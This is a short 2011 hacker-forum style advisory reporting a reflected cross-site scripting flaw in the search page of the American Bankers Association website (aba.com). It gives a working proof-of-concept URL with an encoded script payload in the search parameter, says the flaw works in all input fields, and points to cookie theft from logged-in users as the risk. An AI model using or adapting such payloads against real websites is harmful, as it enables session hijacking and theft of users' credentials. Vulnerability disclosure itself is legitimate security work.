######################################################## | Title : American Bankers Association(aba.com) XSS | Author : Codeine | Email : f3codeine[at]yahoo[dot]com | Site : http://infosecforums.com/ | Date : 08/09/2011 | Cat : PHP[XSS] | URL : http://aba.com/ ######################################################## American Bankers Association uses a search script provided by "xSynthesis Search". After checking no current version by them is vulnerable. Since aba.com allows users to login, this vulnerability presents a great security risk regarding cookie logging. This is not persistent but still provides a area a risk. [*]XSS Vulnerability http://www.aba.com/Search2/searchaba.aspx?xr=t&adv=t&PageSize=10&MaxPages=200&SearchKind=ExactPhrase&SearchPhrase=%3Cscript%3Ealert%28%27CodeineXSS%27%29%3B%3C%2Fscript%3E I used works in all of the input feilds. ______________________________________________________________________________________ Greetz Hidden Ninja